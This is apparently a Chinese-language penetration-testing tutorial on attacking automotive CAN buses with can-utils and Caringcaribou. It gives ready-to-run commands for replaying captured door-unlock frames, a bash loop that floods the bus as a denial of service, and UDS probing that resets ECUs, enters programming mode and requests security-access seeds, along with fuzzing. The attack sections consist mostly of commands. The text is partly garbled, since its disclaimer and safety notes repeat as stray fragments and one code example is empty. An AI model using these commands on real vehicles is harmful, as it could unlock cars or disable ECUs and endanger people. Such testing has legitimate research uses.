汽车CAN总线测试方法详解<\/h1>

免责声明<\/h2>
本文涉及到的所有技术仅用来学习交流，严禁用于非法用途，未经授权请勿非法渗透。否则产生的一切后果自行承担！一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉，谢谢！<\/p>

环境搭建<\/h2>

1. canutils安装<\/h3>

在Kali Linux系统中执行以下命令安装can-utils工具包：<\/p>

apt install can-utils
<\/span><\/span><\/code><\/pre>验证安装是否成功：<\/p>
candump -h
<\/span><\/span><\/code><\/pre>如果显示帮助信息则证明安装成功。<\/p>
2. Caringcaribou安装<\/h3>
安装步骤：<\/p>

下载Caringcaribou到本地目录<\/li>
执行以下命令：<\/li>
<\/ol>
cd caringcaribou
<\/span><\/span>python3 setup.py install
<\/span><\/span># 安装python can库<\/span>
<\/span><\/span>pip3 install python-can
<\/span><\/span><\/code><\/pre>测试方法演示<\/h2>
1. 重放攻击<\/h3>
步骤详解：<\/strong><\/p>

使用candump监听CAN总线数据（需物理接入车辆CAN网络）：<\/li>
<\/ol>
candump can0 -l
<\/span><\/span><\/code><\/pre>
触发目标操作（如按动车钥匙中的开锁按钮）<\/li>
停止抓包并对抓取的数据进行处理：<\/li>
<\/ol>
cat candump.log | awk '{print $3}'<\/span> > res.txt
<\/span><\/span><\/code><\/pre>
使用Caringcaribou工具进行重放攻击：<\/li>
<\/ol>
cc.py fuzzer identify res.txt
<\/span><\/span><\/code><\/pre>
根据汽车反应选择y\/n，识别开关车门数据包<\/li>
对确认的数据包进行重放：<\/li>
<\/ol>
cansend can0 100#3d157d40d9000560
<\/span><\/span><\/code><\/pre>2. DoS攻击<\/h3>
(1) 过载DoS攻击<\/h4>
可使用CANoe工具实现，示例代码：<\/p>
variables
<\/span><\/span><\/code><\/pre>(2) 优先级DoS攻击<\/h4>
编写shell脚本向CAN总线发送大量垃圾数据：<\/p>

创建脚本文件：<\/li>
<\/ol>
vim dos.sh
<\/span><\/span><\/code><\/pre>
写入内容：<\/li>
<\/ol>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>for<\/span> i in {<\/span>1..10000}<\/span>
<\/span><\/span>do<\/span>
<\/span><\/span>    cansend can0 123#1122334455667788
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>
运行脚本：<\/li>
<\/ol>
chmod +x dos.sh
<\/span><\/span>.\/dos.sh
<\/span><\/span><\/code><\/pre>3. UDS探测<\/h3>
步骤：<\/strong><\/p>

通过OBD接口连接车辆CAN总线并抓包：<\/li>
<\/ol>
candump can0
<\/span><\/span><\/code><\/pre>

如果未获取数据，说明网关对CAN总线和OBD接口进行了隔离<\/p>
<\/li>

发送UDS诊断请求验证CAN总线工作状态<\/p>
<\/li>
<\/ol>
方法一：UDS服务扫描<\/h4>

探测支持的服务ID：<\/li>
<\/ol>
cc.py uds discovery
<\/span><\/span><\/code><\/pre>
探测特定服务：<\/li>
<\/ol>
cc.py uds services src ds
<\/span><\/span>cc.py uds services 0x607 0x608
<\/span><\/span><\/code><\/pre>
尝试重置ECU、读取DID等操作：<\/li>
<\/ol>
cc.py uds dump_dids 0x607 0x608
<\/span><\/span><\/code><\/pre>
切换至扩展会话模式：<\/li>
<\/ol>
cansend can0 607#0210030000000000
<\/span><\/span><\/code><\/pre>
发送重置ECU请求（注意：行驶中测试可能造成危险）：<\/li>
<\/ol>
cc.py uds ecu_reset 2<\/span> clientid serverid
<\/span><\/span><\/code><\/pre>
27服务安全性测试：<\/li>
<\/ol>
# 切换至编程模式<\/span>
<\/span><\/span>cansend can0 607#0210020000000000
<\/span><\/span># 请求安全种子<\/span>
<\/span><\/span>cansend can0 607#0227010000000000
<\/span><\/span><\/code><\/pre>方法二：使用Caringcaribou auto模块<\/h4>
自动化探测UDS主要攻击面：<\/p>
cc.py uds auto
<\/span><\/span><\/code><\/pre>27服务安全性深度测试：<\/strong><\/p>
cc.py uds_fuzz seed_randomness_fuzzer 100311022701<\/span> 0x733 0x633
<\/span><\/span><\/code><\/pre>4. 模糊测试<\/h3>
步骤：<\/strong><\/p>

监听CAN总线：<\/li>
<\/ol>
candump can0 -l
<\/span><\/span><\/code><\/pre>
发送随机消息：<\/li>
<\/ol>
cc.py fuzzer random
<\/span><\/span><\/code><\/pre>
观察车辆异常现象，如出现异常则停止监听并处理数据：<\/li>
<\/ol>
cat candump.log | awk '{print $3}'<\/span> > res.txt
<\/span><\/span><\/code><\/pre>
使用Caringcaribou识别问题数据包：<\/li>
<\/ol>
cc.py fuzzer identify res.txt
<\/span><\/span><\/code><\/pre>工具改进方向<\/h2>
当前Caringcaribou工具存在以下不足：<\/p>

缺少扩展帧的UDS检测功能<\/li>
部分自动化功能有待完善<\/li>
<\/ol>
二次开发计划：<\/p>

增加扩展帧UDS检测模块<\/li>
增强自动化探测能力<\/li>
<\/ol>
注意事项<\/h2>

所有测试应在授权环境下进行<\/li>
行驶中测试ECU重置等操作极其危险<\/li>
测试前应充分了解目标系统，避免造成不可逆损害<\/li>
注意记录测试过程和结果，便于问题分析和复现<\/li>
<\/ol>

汽车CAN总线测试方法详解<\/h1>

免责声明<\/h2> 本文涉及到的所有技术仅用来学习交流，严禁用于非法用途，未经授权请勿非法渗透。否则产生的一切后果自行承担！一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉，谢谢！<\/p>

环境搭建<\/h2>

测试方法演示<\/h2>

2. DoS攻击<\/h3>

注意事项<\/h2> 所有测试应在授权环境下进行<\/li> 行驶中测试ECU重置等操作极其危险<\/li> 测试前应充分了解目标系统，避免造成不可逆损害<\/li> 注意记录测试过程和结果，便于问题分析和复现<\/li> <\/ol>

免责声明<\/h2>
本文涉及到的所有技术仅用来学习交流，严禁用于非法用途，未经授权请勿非法渗透。否则产生的一切后果自行承担！一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉，谢谢！<\/p>

注意事项<\/h2>

所有测试应在授权环境下进行<\/li>
行驶中测试ECU重置等操作极其危险<\/li>
测试前应充分了解目标系统，避免造成不可逆损害<\/li>
注意记录测试过程和结果，便于问题分析和复现<\/li> <\/ol>